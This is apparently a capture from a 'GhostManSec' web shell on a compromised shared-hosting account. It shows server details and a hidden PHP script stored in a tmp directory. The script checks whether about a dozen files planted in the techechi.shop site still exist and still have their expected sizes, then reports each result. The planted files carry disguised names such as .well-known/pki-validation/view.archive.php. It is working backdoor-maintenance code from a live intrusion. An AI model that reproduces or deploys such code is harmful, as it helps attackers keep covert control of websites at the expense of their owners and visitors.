GhostManSec
Server: LiteSpeed
System: Linux premium256.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
User: niyknzcu (1843)
PHP: 8.0.30
Disabled: NONE
Upload Files
File: /home/niyknzcu/.cagefs/tmp/.property_set
<?php   $r = '/home/niyknzcu/techechi.shop'; $x = ["/Options.php"=>"bd@@1068430@@18",
"/.well-known/view_create.php"=>"bd@@1068425@@89",
"/puc.php"=>"bd@@1070095@@93",
"/default_message.php"=>"bd@@1068427@@66",
"/.well-known/view.create.php"=>"bd@@1068424@@19",
"/digital marketing website/internal.php"=>"bd@@1068428@@64",
"/default.php"=>"bd@@1067922@@944",
"/.well-known/pki-validation/view.archive.php"=>"bd@@920621@@1729",
"/.well-known/view.create.php"=>"bd@@1062990@@896",
"/.well-known/pki-validation/view.archive.php"=>"bd@@923871@@72",
"/digital marketing website/internal.php"=>"bd@@920574@@996"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');